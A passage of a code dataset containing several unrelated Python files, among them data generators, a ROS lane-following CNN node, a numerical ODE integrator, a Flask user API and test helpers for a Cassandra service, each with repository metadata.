(\"\\t\").join(row)\n","repo_name":"JohnUrban/sciara-project-tools","sub_path":"deprecated/pufferfish/pufferfish/TOGENERALIZE/sim_gc.py","file_name":"sim_gc.py","file_ext":"py","file_size_in_byte":8230,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"5058947623","text":"import random\r\nimport numpy\r\nimport math\r\n#insert data στο SDOP\r\n\r\nwith open(\"C:/Users/thoma/OneDrive/Documents/Sxoli/Data_Bases/code_for_data_creation/STATE_DEPOSIT_OF_PHARMACEUTICALS/ADDRESSES.txt\", \"r\") as a2:\r\n for count, line in enumerate(a2):\r\n pass\r\nl1 = count+1\r\n\r\nwith open(\"C:/Users/thoma/OneDrive/Documents/Sxoli/Data_Bases/code_for_data_creation/STATE_DEPOSIT_OF_PHARMACEUTICALS/Cities.txt\", \"r\") as a1:\r\n for count, line in enumerate(a1):\r\n pass\r\nl2 = count + 1\r\na2 = open(\"C:/Users/thoma/OneDrive/Documents/Sxoli/Data_Bases/code_for_data_creation/STATE_DEPOSIT_OF_PHARMACEUTICALS/ADDRESSES.txt\", \"r\")\r\na1 = open(\"C:/Users/thoma/OneDrive/Documents/Sxoli/Data_Bases/code_for_data_creation/STATE_DEPOSIT_OF_PHARMACEUTICALS/Cities.txt\", \"r\")\r\nb = open(\"C:/Users/thoma/OneDrive/Documents/Sxoli/Data_Bases/code_for_data_creation/STATE_DEPOSIT_OF_PHARMACEUTICALS/SDOP_INSERT.txt\", \"w\")\r\nstore = open(\"C:/Users/thoma/OneDrive/Documents/Sxoli/Data_Bases/code_for_data_creation/City_Addr.txt\", \"w\")\r\n\r\n\r\nSmall = min(l1, l2)\r\nBig = max(l1, l2)\r\npollaplotita = math.floor(Big / Small)\r\n\r\nb.write(\"#If you recreated this, remember to remove the last ',' in the file\" + \"\\n\" +\r\n \"INSERT INTO STATE_DEPOSIT_OF_PHARMACEUTICALS\"\r\n \"(CITY, SDOP_RANGE, SDOP_CAPACITY, ADDRESS, SDOP_DELIVERY_TIME)\"\r\n \"VALUES \" + \"\\n\")\r\n\r\n\r\nA = [[0 for col in range(2)] for row in range(Big)]\r\ncounter = 0\r\nfor i in range(0, Small):\r\n d_col1 = a1.readline().replace('\\n', '')\r\n for j in range(0, pollaplotita):\r\n counter = counter +1\r\n d_col2 = a2.readline().replace('\\n', '')\r\n Range = random.randint(0, 80)\r\n cap = random.randint(100, 100000)\r\n del_time = random.randint(1, 14)\r\n str_number = random.randint(1, 150)\r\n addr = d_col2 + str(str_number)\r\n A[counter] = [d_col1, addr]\r\n b.write(\"( '\" + d_col1 + \"', '\" + str(Range) + \"', '\" + str(cap) + \"', '\" + addr + \"', '\" + str(del_time) + \"' ),\" +\"\\n\")\r\nb.write(';' + \"\\n\")\r\nfor i in range (0,Big):\r\n store.write(str(A[i]) + \"\\n\")\r\n\r\na1.close()\r\na2.close()\r\nb.close()\r\nstore.close()\r\n\r\nwith open(\"C:/Users/thoma/OneDrive/Documents/Sxoli/Data_Bases/code_for_data_creation/City_Addr.txt\", 'r') as fin:\r\n data = fin.read().splitlines(True)\r\n\r\nwith open(\"C:/Users/thoma/OneDrive/Documents/Sxoli/Data_Bases/code_for_data_creation/City_Addr.txt\", 'w') as fout:\r\n fout.writelines(data[1:])\r\n","repo_name":"PavlosTzitzos/database-project","sub_path":"sql/creation and data insertion/STATE_DEPOSIT_OF_PHARMACEUTICALS.py","file_name":"STATE_DEPOSIT_OF_PHARMACEUTICALS.py","file_ext":"py","file_size_in_byte":2438,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15975793461","text":"from Phidget22.PhidgetException import *\nfrom Phidget22.Phidget import *\nfrom PhidgetDataLogger import Sensor\nimport numpy as np\nfrom time import sleep\nimport time\nimport queue\n\nclass DummySensor(Sensor):\n ''' Class derived from Sensor to simulte a phidget sensor by outputting\n sin waves. Used for testing application without phidgets.'''\n\n def __init__(self, omega,refreshPeriod,sensorName=None):\n '''\n Constructor for dummy sensor. omega is used to change frquency of output sin wave.\n '''\n self.refreshPeriod = refreshPeriod*1000.0\n self.sensorName = sensorName\n self.omega = omega\n self.sensorUnits = \"N/A\"\n self.times =[ ]\n self.data = []\n self.startTime = time.time()\n\n def getData(self):\n '''\n Overrides getData method from Sensor. Returns time and dummy sensor values\n as well as all values logged since last refresh period\n '''\n if time.time()- self.startTime > 15:\n self.data = []\n self.times = []\n self.startTime =time.time()\n y = np.sin(self.omega*time.time())\n x= time.time()-self.startTime\n self.times.append(x)\n self.data.append(y)\n return([time.time()],[y],self.times,self.data )\n","repo_name":"hipersfera/PhidgetDataLogger","sub_path":"DummySensor.py","file_name":"DummySensor.py","file_ext":"py","file_size_in_byte":1282,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"13242169821","text":"# -*- coding: utf-8 -*-\n\n# input module\n\n\ndef splitnumbers(delimiter, str):\n newlist = []\n tmp = ''\n\n for c in str:\n if c == delimiter:\n if len(tmp) == 0:\n continue\n else:\n newlist.append(int(tmp))\n tmp = ''\n else:\n tmp += c\n \"\"\"for i, c in enumerate(str):\n if str[i] == delimiter:\n if len(tmp) == 0:\n continue\n else:\n newlist.append(int(tmp))\n tmp = ''\n else:\n tmp += c\"\"\"\n if len(tmp) != 0:\n newlist.append(int(tmp))\n tmp = ''\n\n if len(newlist) == 0:\n return None\n else:\n return newlist\n\n\ndef loadfromfile(filepath):\n file = open(filepath, 'rt')\n buff = file.readline()\n nums1 = splitnumbers(' ', buff)\n buff = file.readline()\n nums2 = splitnumbers(' ', buff)\n return nums1, nums2\n\n\ndef getfrominput():\n ok = True\n newlist = []\n while ok:\n x = input(\"Enter the element (~ for end of input) : \")\n if x == \"~\":\n ok = False\n else:\n newlist.append(int(x))\n if len(newlist) == 0:\n return None\n else:\n return newlist\n","repo_name":"floatint/TasksOOP","sub_path":"Task_1_21/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1236,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"22557908731","text":"#!/usr/bin/env python\n\nimport numpy as np\nimport rospy\n#import picamera\nimport math\nfrom cv_bridge import CvBridge\nbridge = CvBridge()\nfrom sensor_msgs.msg import Image\nfrom std_msgs.msg import Float32MultiArray\nimport cv2\nimport time\nimport torch\nimport torch.nn as nn\nfrom torchvision import datasets ,transforms\nfrom matplotlib import pyplot as plt\nimport numpy as np\nimport matplotlib.pyplot as plt \nimport torch.optim as optim\nimport torchvision\n\nweight_path_angle = \"/home/ubuntu/subt-duckiefloat/catkin_ws/src/duckiefloat_control/src/line_angle_71.pth\"\nweight_path_distance = \"/home/ubuntu/subt-duckiefloat/catkin_ws/src/duckiefloat_control/src/line_center_83.pth\"\n\nclass Temp_Model_angle(nn.Module):\n def __init__(self):\n super(Temp_Model_angle, self).__init__()\n self.conv1 = nn.Sequential( \n nn.Conv2d(\n in_channels=3, \n out_channels=32, \n kernel_size=4, \n stride=1, \n padding=0, \n ), \n nn.MaxPool2d(kernel_size=2, stride=2), \n )\n self.conv2 = nn.Sequential( \n nn.Conv2d(\n in_channels=32,\n out_channels=32,\n kernel_size=4,\n stride=1,\n padding=0,\n ), \n nn.MaxPool2d(kernel_size=2, stride=2), \n )\n self.conv3 = nn.Sequential( \n nn.Conv2d(\n in_channels=32,\n out_channels=32,\n kernel_size=4,\n stride=1,\n padding=0,\n ), \n nn.MaxPool2d(kernel_size=2, stride=2), \n )\n self.conv4 = nn.Sequential( \n nn.Conv2d(\n in_channels=32,\n out_channels=32,\n kernel_size=4,\n stride=1,\n padding=1,\n ), \n nn.MaxPool2d(kernel_size=2, stride=2), \n )\n self.fc1 = nn.Linear(38528, 200)\n self.fc2 = nn.Linear(200, 13)\n \n\n def forward(self, x):\n x = self.conv1(x)\n x = self.conv2(x)\n x = self.conv3(x)\n x = self.conv4(x)\n x = x.view(x.size(0), -1)\n x = self.fc1(x)\n x = self.fc2(x)\n return x\n\nclass Temp_Model_distance(nn.Module):\n def __init__(self):\n super(Temp_Model_distance, self).__init__()\n self.conv1 = nn.Sequential( \n nn.Conv2d(\n in_channels=3, \n out_channels=32, \n kernel_size=4, \n stride=1, \n padding=0, \n ), \n nn.MaxPool2d(kernel_size=2, stride=2), \n )\n self.conv2 = nn.Sequential( \n nn.Conv2d(\n in_channels=32,\n out_channels=32,\n kernel_size=4,\n stride=1,\n padding=0,\n ), \n nn.MaxPool2d(kernel_size=2, stride=2), \n )\n self.conv3 = nn.Sequential( \n nn.Conv2d(\n in_channels=32,\n out_channels=32,\n kernel_size=4,\n stride=1,\n padding=0,\n ), \n nn.MaxPool2d(kernel_size=2, stride=2), \n )\n self.conv4 = nn.Sequential( \n nn.Conv2d(\n in_channels=32,\n out_channels=32,\n kernel_size=4,\n stride=1,\n padding=1,\n ), \n nn.MaxPool2d(kernel_size=2, stride=2), \n )\n self.fc1 = nn.Linear(38528, 200)\n self.fc2 = nn.Linear(200, 10)\n \n\n def forward(self, x):\n x = self.conv1(x)\n x = self.conv2(x)\n x = self.conv3(x)\n x = self.conv4(x)\n x = x.view(x.size(0), -1)\n x = self.fc1(x)\n x = self.fc2(x)\n return x\n\nclass Pose(object):\n def __init__(self):\n self.node_name = rospy.get_name()\n self.initial()\n self.count = 0\n self.dcc = 0.16\n self.state = None\n self.Angle = np.array([-30,-40,-50,-60,-70,-80,30,40,50,60,70,80,0]) #L-----R, S\n self.Distance = np.array([-70,-140,-210,-280,-350,70,140,210,280,350]) #L-----R\n self.Pose_c = rospy.Publisher(\"/state_estimator_node/current_pose\", Float32MultiArray, queue_size = 1)\n self.Pose_t = rospy.Publisher(\"/state_estimator_node/target_pose\", Float32MultiArray, queue_size = 1)\n self.img_sub = rospy.Subscriber('img', Image, self.c_pose, queue_size = 1)\n\n def initial(self):\n self.model_angle = Temp_Model_angle()\n self.model_distance = Temp_Model_distance()\n self.model_angle.load_state_dict(torch.load(weight_path_angle))\n self.model_distance.load_state_dict(torch.load(weight_path_distance))\n\n def c_pose(self, data):\n self.count += 1\n if self.count == 1:\n self.count = 0\n try:\n # convert image_msg to cv format\n img = bridge.imgmsg_to_cv2(data, desired_encoding = \"passthrough\")\n #img = cv2.resize(img, self.dim)\n\n data_transform = transforms.Compose([\n transforms.ToTensor()])\n img = data_transform(img)\n images = torch.unsqueeze(img,0)\n \n \n device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n images = images.to(device)\n self.model_angle = self.model_angle.to(device)\n self.model_distance = self.model_distance.to(device)\n\n output_angle = self.model_angle(images)\n output_distance = self.model_distance(images)\n top1 = output_angle.argmax()\n top2 = output_distance.argmax()\n self.angle = self.Angle[top1]\n self.distance = self.Distance[top2]\n \n # pose estimate\n current_pose = Float32MultiArray()\n target_pose = Float32MultiArray()\n # L & left(d<0)\n if (self.angle < 0) and (self.distance < 0):\n self.distance = (-1)*(self.distance*math.sin(math.radians(self.angle)) - self.dcc*math.cos(math.radians(self.angle)))\n self.angle = 90 + self.angle\n self.state = 'L'+str(self.angle)+'D'+str(self.distance)\n # L & right(d>0)\n if (self.angle < 0) and (self.distance > 0):\n self.distance = (-1)*self.distance*math.sin(math.radians(self.angle)) + self.dcc*math.cos(math.radians(self.angle))\n self.angle = 90 + self.angle\n self.state = 'L'+str(self.angle)+'D'+str(self.distance)\n # R & left(d<0)\n if (self.angle > 0) and (self.distance < 0):\n self.distance = (-1)*((-1)*self.distance*math.sin(math.radians(self.angle)) + self.dcc*math.cos(math.radians(self.angle)))\n self.angle = 90 - self.angle\n self.state = 'R'+str(self.angle)+'D'+str(self.distance)\n # R & right(d>0)\n if (self.angle > 0) and (self.distance > 0):\n self.distance = self.distance*math.sin(math.radians(self.angle)) - self.dcc*math.cos(math.radians(self.angle))\n self.angle = 90 - self.angle\n self.state = 'R'+str(self.angle)+'D'+str(self.distance)\n # S\n if self.angle == 0:\n self.distance = self.distance\n self.angle = self.angle\n self.state = 'S'+str(self.angle)+'D'+str(self.distance)\n\n current_pose[0] = self.distance\n current_pose[1] = self.angle\n target_pose[0] = 0\n tarhet_pose[1] = 0\n \n self.Pose_c.publish(current_pose)\n self.Pose_t.publish(target_pose)\n \n rospy.loginfo('\\n'+self.state+'\\n')\n\n except CvBridgeError as e:\n print(e)\n\nif __name__ == \"__main__\":\n rospy.init_node(\"lane_follow\", anonymous=False)\n POSE = Pose()\n rospy.spin()\n","repo_name":"ARG-NCTU/duckiefloat_ros","sub_path":"duckiefloat_control/src/lane_follow.py","file_name":"lane_follow.py","file_ext":"py","file_size_in_byte":8743,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"32180813444","text":"import os\nimport pandas\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndef getQ(lines):\n Q = []\n for i in range(1, len(lines)):\n tempQ = lines[i].split('\\t')[0]\n Q += [float(tempQ)]\n return np.array(Q)\n\npath = '../Suddenpollution/'\nfiles = os.listdir(path)\nQ = []\nfor file in files:\n fin = open(path+file)\n lines = fin.readlines()\n fin.close()\n tempQ = getQ(lines)\n Q += [tempQ]\n fig, ax = plt.subplots()\n x = np.linspace(0,1, len(Q[0]))\n ax.plot(x, tempQ, 'k--')\n plt.savefig(str(file.split('.')[0])+'jpg')\n\n\n","repo_name":"Hydro6410/Demo","sub_path":"Datain/code/Sudeenpollution.py","file_name":"Sudeenpollution.py","file_ext":"py","file_size_in_byte":565,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"4336647659","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jul 5 13:19:40 2017\n\n@author: Massimo De Mauri\n\"\"\"\n\nimport MIRT_OC as oc\n\ndef integrate_ode(x,p,ode,dt,options = None):\n\n opts = {}\n opts['schema'] = 'rk4'\n opts['n_steps'] = 1\n\n\n\n if not options is None:\n for k in options:\n if k in opts:\n opts[k] = options[k]\n else:\n oc.warn('Option not recognized : ' + k )\n\n if opts['schema'] == 'e_euler':\n\n table = oc.DM([[0,0],[0,1]])\n intg = oc.butcher_integrator('F',table,{'x':x,'p':oc.vertcat(p,dt),'ode':dt*oc.vertcat(*ode)},{'tf':1,'n_steps':opts['n_steps']})\n\n elif opts['schema'] == 'i_euler':\n\n table = oc.DM([[1,1],[0,1]])\n intg = oc.butcher_integrator('F',table,{'x':x,'p':oc.vertcat(p,dt),'ode':dt*oc.vertcat(*ode)},{'tf':1,'n_steps':opts['n_steps']})\n\n elif opts['schema'] == 'rk4':\n\n table = oc.DM([[0,0,0,0,0],[.5,.5,0,0,0],[.5,0,.5,0,0],[1,0,0,1,0],[0,1/6,1/3,1/3,1/6]])\n intg = oc.butcher_integrator('F',table,{'x':x,'p':oc.vertcat(p,dt),'ode':dt*oc.vertcat(*ode)},{'tf':1,'n_steps':opts['n_steps']})\n\n elif opts['schema'] == 'ralston':\n\n table = oc.DM([[0,0,0],[2/3,2/3,0],[0,.25,.75]])\n intg = oc.butcher_integrator('F',table,{'x':x,'p':oc.vertcat(p,dt),'ode':dt*oc.vertcat(*ode)},{'tf':1,'n_steps':opts['n_steps']})\n\n elif opts['schema'] == 'gl2':\n\n table = oc.DM([[.5,.5],[0,1]])\n intg = oc.butcher_integrator('F',table,{'x':x,'p':oc.vertcat(p,dt),'ode':dt*oc.vertcat(*ode)},{'tf':1,'n_steps':opts['n_steps']})\n\n elif opts['schema'] == 'gl4':\n\n table = oc.DM([[.5+oc.sqrt(3)/6,.25,.25+oc.sqrt(3)/6],[.5-oc.sqrt(3)/6,.25-oc.sqrt(3)/6,.25],[0,.5,.5]])\n intg = oc.butcher_integrator('F',table,{'x':x,'p':oc.vertcat(p,dt),'ode':dt*oc.vertcat(*ode)},{'tf':1,'n_steps':opts['n_steps']})\n\n elif opts['schema'] == 'gl6':\n\n table = oc.DM([[.5-oc.sqrt(15)/10,5/36,2/9-oc.sqrt(15)/15,5/36-oc.sqrt(15)/30],[.5,5/36+oc.sqrt(15)/24,2/9,5/36-oc.sqrt(15)/24],[.5+oc.sqrt(15)/10,5/36+oc.sqrt(15)/30,2/9+oc.sqrt(15)/15,5/36],[0,5/18,4/9,5/18]])\n intg = oc.butcher_integrator('F',table,{'x':x,'p':oc.vertcat(p,dt),'ode':dt*oc.vertcat(*ode)},{'tf':1,'n_steps':opts['n_steps']})\n\n\n elif type(opts['schema']) == type(oc.DM()):\n\n oc.butcher_integrator(table,x,p,ode,dt,{'n_steps':opts['n_steps']})\n\n else:\n raise NameError(opts['schema'] + ' not implemented')\n return None\n\n\n return intg\n","repo_name":"MassimoDM/MIRT_OC","sub_path":"src/integration/integrate_ode.py","file_name":"integrate_ode.py","file_ext":"py","file_size_in_byte":2513,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"72529748073","text":"\n# The difference with _v3 is that here the particles can have different mass and the gravitational acceleration calculation is accordingly modified.\n# The difference with _v2 is that here we incorporate shear viscosity by using the Balsara switch.\n# The difference with previous version is that here we separated u and u_previous, ut_previous updates separately. See below.\n# modified to be used with any number of CPUs.\n# New h algorithm is employed !\n\nimport numpy as np\nimport time\nimport pickle\nimport os\nfrom libsx2_2t import *\nfrom mpi4py import MPI\nfrom shear_test3_t_del import *\nimport pandas as pd\n\n\nnp.random.seed(42)\n\ncomm = MPI.COMM_WORLD\nrank = comm.Get_rank()\nnCPUs = comm.Get_size()\n\ndf = pd.read_csv('../test_data.csv', names = ['x', 'y', 'z', 'hprevious'])\nx = df['x'].values\ny = df['y'].values\nz = df['z'].values\n\nr = np.array([x, y, z]).T\n\nprint(r.shape)\n\nh_previous = df['hprevious'].values\n\n\nN = x.shape[0]\n\n#------- used in MPI --------\ncount = N // nCPUs\nremainder = N % nCPUs\n\nif rank < remainder:\n\tnbeg = rank * (count + 1)\n\tnend = nbeg + count + 1\nelse:\n\tnbeg = rank * count + remainder\n\tnend = nbeg + count\n#----------------------------\n\nif rank ==0:\n\tT_h = time.time()\n\nlocal_h = smoothing_fast_new_mpi2(nbeg, nend, r, h_previous)\nh = 0.0\n\nif rank == 0:\n\th = local_h\n\tfor i in range(1, nCPUs):\n\t\thtmp = comm.recv(source = i)\n\t\th = np.concatenate((h, htmp))\nelse:\n\tcomm.send(local_h, dest = 0)\n\nh = comm.bcast(h, root = 0)\n\nif rank == 0:\n\tprint()\n\tprint('T_h = ', time.time() - T_h)\n\tprint()\n\tfor i in range(10):\n\t\tprint(np.round(h_previous[i], 4), np.round(h[i], 4))\n#----------------------\n\n\n\n","repo_name":"hassanfv/SPH_2","sub_path":"11_Dec_2022/MPI_sph/Isothermal_collapse_Aug_2022/Using_Slow_h/Anathpindika_II/Model_4/subSampling_IC/GPU_test/smoothing_h/h_mpi.py","file_name":"h_mpi.py","file_ext":"py","file_size_in_byte":1624,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"33971325866","text":"# This Source Code Form is subject to the terms of the Mozilla Public\n# License, v. 2.0. If a copy of the MPL was not distributed with this\n# file, You can obtain one at http://mozilla.org/MPL/2.0/.\nimport functools\nimport logging\nimport sys\n\nfrom apscheduler.schedulers.blocking import BlockingScheduler\nimport click\nimport datadog\n\nfrom monitor import config, reporting\nfrom monitor.main import determine_commit_replication_status\nfrom monitor.pulse import run_pulse_listener\nfrom monitor.sentry import record_exceptions\n\n\n@click.command()\n@click.option(\n \"--debug\",\n envvar=\"DEBUG\",\n is_flag=True,\n help=\"Print debugging messages about the script's progress.\",\n)\n@click.argument(\"node_ids\", nargs=-1)\ndef display_lag(debug, node_ids):\n \"\"\"Display the replication lag for a repo or an individual commit.\n\n Does not drain any queues or send any data.\n \"\"\"\n if debug:\n logging.basicConfig(stream=sys.stdout, level=logging.DEBUG)\n\n mirror = config.mirror_config_from_environ()\n\n if node_ids:\n for node_id in node_ids:\n status = determine_commit_replication_status(mirror, node_id)\n reporting.print_replication_lag(mirror, status)\n else:\n pulse_config = config.pulse_config_from_environ()\n run_pulse_listener(\n pulse_config.PULSE_USERNAME,\n pulse_config.PULSE_PASSWORD,\n pulse_config.PULSE_EXCHANGE,\n pulse_config.PULSE_QUEUE_NAME,\n pulse_config.PULSE_QUEUE_ROUTING_KEY,\n pulse_config.PULSE_QUEUE_READ_TIMEOUT,\n True,\n worker_args=dict(\n mirror_config=mirror, reporting_function=reporting.print_replication_lag\n ),\n )\n\n\n@click.command()\n@click.option(\n \"--debug\",\n envvar=\"DEBUG\",\n is_flag=True,\n help=\"Print debugging messages about the script's progress.\",\n)\n@click.option(\n \"--no-send\",\n is_flag=True,\n help=\"Do not drain any queues or send any data. Useful for debugging.\",\n)\ndef report_lag(debug, no_send):\n \"\"\"Measure and report repository replication lag to a metrics service.\"\"\"\n\n if debug:\n log_level = logging.DEBUG\n else:\n log_level = logging.INFO\n\n logging.basicConfig(stream=sys.stdout, level=log_level)\n\n mirror = config.mirror_config_from_environ()\n pulse_config = config.pulse_config_from_environ()\n\n if no_send:\n reporting_function = reporting.print_replication_lag\n empty_queue_function = None\n else:\n datadog.initialize()\n reporting_function = reporting.report_to_statsd\n empty_queue_function = functools.partial(\n reporting.report_all_caught_up_to_statsd, mirror\n )\n\n @record_exceptions\n def job():\n run_pulse_listener(\n pulse_config.PULSE_USERNAME,\n pulse_config.PULSE_PASSWORD,\n pulse_config.PULSE_EXCHANGE,\n pulse_config.PULSE_QUEUE_NAME,\n pulse_config.PULSE_QUEUE_ROUTING_KEY,\n pulse_config.PULSE_QUEUE_READ_TIMEOUT,\n no_send,\n worker_args=dict(\n mirror_config=mirror, reporting_function=reporting_function\n ),\n empty_queue_callback=empty_queue_function,\n )\n\n sched = BlockingScheduler()\n\n # Run once right away, then run at intervals\n sched.add_job(job)\n sched.add_job(job, \"interval\", minutes=5)\n\n # This does not return\n sched.start()\n","repo_name":"mozilla-conduit/phabricator-repo-monitor","sub_path":"src/monitor/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":3439,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"69889733352","text":"# Author: Christian Brodbeck \nfrom ..fmtxt import Section\nfrom ._sensor import sensor_results, sensor_time_results\nfrom ._source import source_time_results\nfrom ._uts import time_results\n\n\ndef result_report(res, ds, title=None, colors=None):\n \"\"\"Automatically generate section from an NDTest result object\n\n Parameters\n ----------\n res : NDTest\n Test-result.\n ds : Dataset\n Dataset containing the data on which the test was performed.\n \"\"\"\n sec = Section(title or res._name())\n\n dims = {dim.name for dim in res._dims}\n sec.append(res.info_list())\n\n if dims == {'time'}:\n sec.append(time_results(res, ds, colors))\n elif dims == {'sensor'}:\n sec.append(sensor_results(res, ds, colors))\n elif dims == {'time', 'sensor'}:\n sec.append(sensor_time_results(res, ds, colors))\n elif dims == {'time', 'source'}:\n sec.append(source_time_results(res, ds, colors))\n else:\n raise NotImplementedError(\"dims=%r\" % dims)\n return sec\n","repo_name":"christianbrodbeck/Eelbrain","sub_path":"eelbrain/report/_auto.py","file_name":"_auto.py","file_ext":"py","file_size_in_byte":1037,"program_lang":"python","lang":"en","doc_type":"code","stars":55,"dataset":"github-code","pt":"72"} +{"seq_id":"28343119744","text":"from flask import Flask, request, jsonify, url_for, Blueprint\nfrom api.app.user.controller import register_owner, register_admin, login_user, get_user_by_id, update_user_info\nfrom api.app.rel_user_community.controller import create_rel\nfrom flask_jwt_extended import get_jwt_identity\nfrom flask_jwt_extended import jwt_required\nfrom api.app.rel_user_community.controller import delete_rel\n\nusers = Blueprint('users', __name__)\n\n#REGISTER OWNER\n@users.route('/register/owner/', methods=['POST'])\ndef create_user_owner(community_id):\n body = request.get_json()\n new_user = register_owner(body)\n if new_user is None:\n return jsonify('Internal server error'), 500\n elif new_user == False:\n return jsonify('Bad Request'), 400\n else:\n create_rel(community_id, new_user[\"id\"])\n return jsonify(new_user), 201\n\n#REGISTER ADMIN\n@users.route('/register/admin', methods=['POST'])\ndef create_user_admin():\n body = request.get_json()\n new_user = register_admin(body)\n if new_user is None:\n return jsonify('Internal server error'), 500\n elif new_user == False:\n return jsonify('Bad Request'), 400\n else:\n return jsonify(new_user), 201\n\n#LOGIN\n@users.route('/login', methods=['POST'])\ndef user_login():\n body = request.get_json()\n token = login_user(body)\n print(token)\n if token == 'User does not exist':\n return jsonify(token), 404\n\n elif token == 'Incorrect password':\n return jsonify('Incorrect password'), 401\n\n elif token is None :\n return jsonify('Internal server error'), 500\n else:\n return jsonify(token), 200\n\n#GET USER BY ID\n@users.route(\"/\", methods=['GET'])\n@jwt_required()\ndef get_user():\n user_id = get_jwt_identity()\n user = get_user_by_id(user_id['id'])\n if user is None:\n return jsonify('User not found'), 404\n\n return jsonify(user.serialize()), 200\n\n#UPDATE USER INFO\n@users.route('/modify', methods=['PUT'])\n@jwt_required()\ndef modify_user_info():\n id_user = get_jwt_identity()\n body = request.get_json()\n return update_user_info(id_user[\"id\"], body)\n\n#DELETE USER\n@users.route('/delete/', methods=['DELETE'])\n@jwt_required()\ndef user_delete(user_id_to_delete):\n id_user = get_jwt_identity()\n user = get_user_by_id(id_user[\"id\"]).serialize()\n delete_rel(user_id_to_delete)\n return delete_user(user[\"role\"][\"role_id\"], user_id_to_delete)\n\n\n\n\n\n\n","repo_name":"Sergiogtz10/Gestion-de-comunidades","sub_path":"src/api/app/user/router.py","file_name":"router.py","file_ext":"py","file_size_in_byte":2448,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"22573618507","text":"# 하샤드 수 찾기\ndef solution(x):\n strNum = list(str(x))\n findNum = 0\n for i in range(len(strNum)):\n findNum += int(strNum[i])\n if x % findNum == 0:\n return True\n else:\n return False\n\n# 테스트 돌리기\n\nnum = 123\nprint(solution(num))","repo_name":"jjiwoning/Code_Test","sub_path":"python_algo/Programmers/harshad_number.py","file_name":"harshad_number.py","file_ext":"py","file_size_in_byte":279,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"33136177704","text":"import json\nimport time\nfrom functools import wraps\n\nimport dcos\nimport shakedown\n\nfrom tests.defaults import (\n DEFAULT_NODE_COUNT,\n PACKAGE_NAME,\n TASK_RUNNING_STATE,\n)\n\n\nWAIT_TIME_IN_SECONDS = 600\n\n\ndef as_json(fn):\n @wraps(fn)\n def wrapper(*args, **kwargs):\n try:\n return json.loads(fn(*args, **kwargs))\n except ValueError:\n return None\n\n return wrapper\n\n\ndef cassandra_api_url(basename, app_id='cassandra'):\n return '{}/v1/{}'.format(shakedown.dcos_service_url(app_id), basename)\n\n\ndef check_health():\n def fn():\n return shakedown.get_service_tasks(PACKAGE_NAME)\n\n def success_predicate(tasks):\n running_tasks = [t for t in tasks if t['state'] == TASK_RUNNING_STATE]\n print('Waiting for {} healthy tasks, got {}/{}'.format(\n DEFAULT_NODE_COUNT, len(running_tasks), len(tasks)))\n return (\n len(running_tasks) == DEFAULT_NODE_COUNT,\n 'Service did not become healthy'\n )\n\n return spin(fn, success_predicate)\n\n\ndef get_cassandra_config():\n response = request(\n dcos.http.get,\n marathon_api_url('apps/{}/versions'.format(PACKAGE_NAME))\n )\n assert response.status_code == 200, 'Marathon versions request failed'\n\n version = response.json()['versions'][0]\n\n response = dcos.http.get(marathon_api_url('apps/{}/versions/{}'.format(PACKAGE_NAME, version)))\n assert response.status_code == 200\n\n config = response.json()\n del config['uris']\n del config['version']\n\n return config\n\n\n@as_json\ndef get_dcos_command(command):\n result, error = shakedown.run_dcos_command(command)\n if error:\n raise RuntimeError(\n 'command dcos {} {} failed'.format(command, PACKAGE_NAME)\n )\n\n return result\n\n\ndef marathon_api_url(basename):\n return '{}/v2/{}'.format(shakedown.dcos_service_url('marathon'), basename)\n\n\ndef request(request_fn, *args, **kwargs):\n def success_predicate(response):\n return (\n response.status_code in [200, 202],\n 'Request failed: %s' % response.content,\n )\n\n return spin(request_fn, success_predicate, *args, **kwargs)\n\n\ndef spin(fn, success_predicate, *args, **kwargs):\n end_time = time.time() + WAIT_TIME_IN_SECONDS\n while time.time() < end_time:\n result = fn(*args, **kwargs)\n is_successful, error_message = success_predicate(result)\n if is_successful:\n print('Success state reached, exiting spin. prev_err={}'.format(error_message))\n break\n print('Waiting for success state... err={}'.format(error_message))\n time.sleep(1)\n\n assert is_successful, error_message\n\n return result\n\n\ndef uninstall():\n print('Uninstalling/janitoring {}'.format(PACKAGE_NAME))\n try:\n shakedown.uninstall_package_and_wait(PACKAGE_NAME, app_id=PACKAGE_NAME)\n except (dcos.errors.DCOSException, ValueError) as e:\n print('Got exception when uninstalling package, continuing with janitor anyway: {}'.format(e))\n\n shakedown.run_command_on_master(\n 'docker run mesosphere/janitor /janitor.py '\n '-r cassandra-role -p cassandra-principal -z dcos-service-cassandra '\n '--auth_token={}'.format(\n shakedown.run_dcos_command(\n 'config show core.dcos_acs_token'\n )[0].strip()\n )\n )\n","repo_name":"verma7/dcos-cassandra-service","sub_path":"integration/tests/command.py","file_name":"command.py","file_ext":"py","file_size_in_byte":3372,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"72181937193","text":"from django.http.response import JsonResponse\n\n# Create your views here.\nfrom django.views.generic.base import TemplateView\nfrom mongoengine.errors import DoesNotExist\nimport numpy\nimport geometry\nfrom socialparq.models import ZonaParquimetro\n\n\nclass JSONResponseMixin(object):\n def render_to_json_response(self, context, **response_kwargs):\n return JsonResponse(context, **response_kwargs)\n\n\nclass 